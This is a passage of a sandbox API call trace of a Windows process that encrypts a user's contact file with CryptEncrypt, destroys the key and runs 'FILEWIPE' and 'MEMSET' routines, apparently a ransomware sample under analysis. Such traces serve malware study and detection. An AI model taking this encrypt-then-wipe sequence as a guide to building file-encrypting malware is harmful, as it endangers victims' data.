CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7c4170*, pdwDataLen=0x61e2d8*=0x10b1e, dwBufLen=0x10b20 | out: pbData=0x7c4170*, pdwDataLen=0x61e2d8*=0x10b20) returned 1 [0074.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.811] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0074.811] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0074.811] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.811] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0074.811] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.811] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.816] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.816] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.816] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.819] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.819] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.819] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0074.819] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0074.819] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.819] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0074.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.820] CryptDestroyKey (hKey=0x6b8b78) returned 1 [0074.822] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0074.822] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0074.823] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0074.823] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0074.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0074.823] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0074.823] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0074.823] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0074.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0074.823] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0074.823] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0074.823] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0074.824] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0074.824] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0074.824] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.824] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0074.824] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0074.824] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0074.824] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0074.824] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0074.824] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0074.824] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.824] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0074.824] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0074.824] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0074.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.824] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0074.824] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.825] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.825] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0074.825] FreeLibrary (hLibModule=0x77710000) returned 1 [0074.825] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.825] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.825] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.825] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.826] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.836] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.836] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0074.836] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.836] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x657690, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x6b8b38 [0074.837] FindClose (in: hFindFile=0x6b8b38 | out: hFindFile=0x6b8b38) returned 1 [0074.837] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0074.837] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0074.837] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0074.837] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0074.837] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690910 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0074.837] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0074.838] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0074.838] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0074.838] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.838] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.838] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.838] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.838] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0074.838] CharLowerBuffW (in: lpsz="byte[68382]", cchLength=0xb | out: lpsz="byte[68382]") returned 0xb [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.838] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0074.838] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.839] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.839] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0074.839] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.839] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0074.839] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0074.839] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0074.839] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10b1e) returned 0x771fe8 [0074.840] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0074.840] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0074.840] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0074.840] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0074.840] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df70 | out: hHeap=0x650000) returned 1 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b480 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.841] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908d0 [0074.841] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.841] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0074.841] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6908d0 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690970 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0074.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0074.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0074.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0074.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da18 | out: hHeap=0x650000) returned 1 [0074.842] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690970 [0074.842] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906d0 [0074.843] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690980 [0074.843] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df28 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da18 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db58 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0074.843] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0074.843] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0074.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0074.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0074.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908b0 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0074.844] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0074.844] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0074.844] 